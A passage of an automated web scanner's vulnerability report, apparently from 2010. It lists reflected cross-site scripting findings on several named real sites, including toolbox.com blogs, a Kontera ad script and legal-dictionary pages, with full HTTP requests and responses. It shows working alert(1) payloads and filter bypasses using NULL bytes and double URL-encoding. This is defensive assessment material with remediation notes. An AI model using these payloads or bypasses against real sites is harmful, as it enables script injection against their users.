    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26a46c1'-alert(1)-'51ddbdc9083%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.28. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/juice-analytics

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99a6f'-alert(1)-'92e78444f0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/juice-analytics?99a6f'-alert(1)-'92e78444f0f=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
tnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%2699a6f'-alert(1)-'92e78444f0f%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.29. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/minimalit

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88e2f'-alert(1)-'ef739976327 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/minimalit?88e2f'-alert(1)-'ef739976327=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%2688e2f'-alert(1)-'ef739976327%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.30. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/penguinista-databasiensis

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeadc'-alert(1)-'3bb1edec4a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/penguinista-databasiensis?eeadc'-alert(1)-'3bb1edec4a3=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...

{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dpenguinista-databasiensis%26eeadc'-alert(1)-'3bb1edec4a3%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.31. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab562'-alert(1)-'9b9ed2ddc2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday?ab562'-alert(1)-'9b9ed2ddc2d=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26ab562'-alert(1)-'9b9ed2ddc2d%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.32. http://kona40.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b77a2"%3balert(1)//3e3ba67956d was submitted in the l parameter. This input was echoed as b77a2";alert(1)//3e3ba67956d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1291038775232&p=153980&k=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3DusjpNNP3&al=1&l=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dusb77a2"%3balert(1)//3e3ba67956d&t=Ab%26onment+meaning+%7C+Massachusetts+Divorce+Law+Dictionary&m1=Legal+Dictionary+%2C+Legal+definition+%2C+Legal+interpretation+%2C+Legal+terms+%2C+Legal+terminology+%2C+Legal+ency&rId=0&rl=0&1=14&mod=536936475&rm=1&dc_aff_id=&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=56D74502-D65A-11DF-A763-0016D1111177; cluid=-2494676081286926934173; imprs=1

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1128

konaSafe(function(){
teUrl='http://te10.kontera.com/ContentLink/ContentLink?publisherId=153980&layout=adlinks&sId=&cb=1291049963&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(8);
reJson
...[SNIP]...
//webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment massachusetts divorce abandonment&cd=2&hl=en&ct=clnk&gl=usb77a2";alert(1)//3e3ba67956d&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

1.33. http://kona40.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009c46d"-alert(1)-"bff267b9f90 was submitted in the rId parameter. This input was echoed as 9c46d"-alert(1)-"bff267b9f90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /KonaGet.js?u=1291038775232&p=153980&k=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3DusjpNNP3&al=1&l=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dus&t=Ab%26onment+meaning+%7C+Massachusetts+Divorce+Law+Dictionary&m1=Legal+Dictionary+%2C+Legal+definition+%2C+Legal+interpretation+%2C+Legal+terms+%2C+Legal+terminology+%2C+Legal+ency&rId=287024511125213104%009c46d"-alert(1)-"bff267b9f90&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=536936475&rt=0&st=1&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_&1291038778341 HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=56D74502-D65A-11DF-A763-0016D1111177; cluid=-2494676081286926934173; imprs=1

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 3417

konaSafe(function(){
teUrl='http://te10.kontera.com/ContentLink/ContentLink?publisherId=153980&layout=adlinks&sId=702,271&cb=1291049969&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(3);
...[SNIP]...
[] } }, { "bridge_position" : { "value" : "" } }, { "advanced_setting_ad_type_id" : { "value" : 10 } } ]});
teDataHere(false,'153980','1');
konaTweakMode=536936987;
konaRequestId="287024511125213104%009c46d"-alert(1)-"bff267b9f90";
konaPageLoadSendReport=0;
setKonaResults(1,0,"L|0|0|0|white|none&pRfr=http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dic
...[SNIP]...

1.34. http://kona40.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be16a"-alert(1)-"14499de9b36 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1291038775232&p=153980&k=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3DusjpNNP3&al=1&l=http%3A//webcache.googleusercontent.com/search%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dus&t=Ab%26onment+meaning+%7C+Massachusetts+Divorce+Law+Dictionary&m1=Legal+Dictionary+%2C+Legal+definition+%2C+Legal+interpretation+%2C+Legal+terms+%2C+Legal+terminology+%2C+Legal+ency&rId=0be16a"-alert(1)-"14499de9b36&rl=0&1=14&mod=536936475&rm=1&dc_aff_id=&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=56D74502-D65A-11DF-A763-0016D1111177; cluid=-2494676081286926934173; imprs=1

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1188

konaSafe(function(){
teUrl='http://te10.kontera.com/ContentLink/ContentLink?publisherId=153980&layout=adlinks&sId=&cb=1291049965&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(8);
reJson
...[SNIP]...
36297\",c3:\"12345678\"});", "scriptURL" : "http://b.scorecardresearch.com/beacon.js" } ] });
pageTopicVector="";
}, "reaction response");
konaSafe(function(){
konaTweakMode=536936987;
konaRequestId="0be16a"-alert(1)-"14499de9b36";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dic
...[SNIP]...

1.35. http://massachusetts.uscity.net/Anger_Management/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://massachusetts.uscity.net
Path:   /Anger_Management/x22

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4f76<script>alert(1)</script>a9e2e27fca5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Managementb4f76<script>alert(1)</script>a9e2e27fca5/x22 HTTP/1.1
Host: massachusetts.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 17:10:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7276

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://massachusetts.uscity.net/Anger_Managementb4f76<script>alert(1)</script>a9e2e27fca5/x22 <br>
...[SNIP]...

1.36. http://massachusetts.uscity.net/Anger_Management/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://massachusetts.uscity.net
Path:   /Anger_Management/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cb19<script>alert(1)</script>ff68e9debd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Management/x226cb19<script>alert(1)</script>ff68e9debd3 HTTP/1.1
Host: massachusetts.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 17:10:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7276

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://massachusetts.uscity.net/Anger_Management/x226cb19<script>alert(1)</script>ff68e9debd3 <br>
...[SNIP]...

1.37. http://massachusetts.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://massachusetts.uscity.net
Path:   /Anger_Management/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5217<script>alert(1)</script>4e2be8e118b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Management/x22?e5217<script>alert(1)</script>4e2be8e118b=1 HTTP/1.1
Host: massachusetts.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 17:10:04 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7279

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://massachusetts.uscity.net/Anger_Management/x22?e5217<script>alert(1)</script>4e2be8e118b=1 <br>
...[SNIP]...

1.38. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Canadian-Insolvency-Dictionary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51a3d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef51fe0d5580 was submitted in the REST URL parameter 1. This input was echoed as 51a3d"><script>alert(1)</script>f51fe0d5580 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Canadian-Insolvency-Dictionary51a3d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef51fe0d5580/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:08 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 25412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/Canadian-Insolvency-Dictionary51a3d"><script>alert(1)</script>f51fe0d5580/">
...[SNIP]...

1.39. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Canadian-Insolvency-Dictionary/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a75a6%2527%253balert%25281%2529%252f%252fa63430848df was submitted in the REST URL parameter 1. This input was echoed as a75a6';alert(1)//a63430848df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Canadian-Insolvency-Dictionarya75a6%2527%253balert%25281%2529%252f%252fa63430848df/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 23779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
define').term.value;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionarya75a6';alert(1)//a63430848df/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.40. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Canadian-Insolvency-Dictionary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8aa42%253cscript%253ealert%25281%2529%253c%252fscript%253ed0bd9f4ed96 was submitted in the REST URL parameter 1. This input was echoed as 8aa42<script>alert(1)</script>d0bd9f4ed96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Canadian-Insolvency-Dictionary8aa42%253cscript%253ealert%25281%2529%253c%252fscript%253ed0bd9f4ed96/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:34 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 25059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>d0bd9f4ed96/">Canadian Insolvency Dictionary8aa42<script>alert(1)</script>d0bd9f4ed96</a>
...[SNIP]...

1.41. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /Canadian-Insolvency-Dictionary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 908fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30364464e3d was submitted in the REST URL parameter 1. This input was echoed as 908fb</title><script>alert(1)</script>30364464e3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Canadian-Insolvency-Dictionary908fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30364464e3d/ HTTP/1.1
Host: miscellaneous.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 25777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>Canadian Insolvency Dictionary908fb</title><script>alert(1)</script>30364464e3d | Free Legal Dictionary</title>
...[SNIP]...

1.42. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://miscellaneous.legaldictionaries.org
Path:   /OJJDPs-Performance-Measures-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f70%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3a061e205b was submitted in the REST URL parameter 1. This input was echoed as f8f70"><script>alert(1)</script>d3a061e205b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

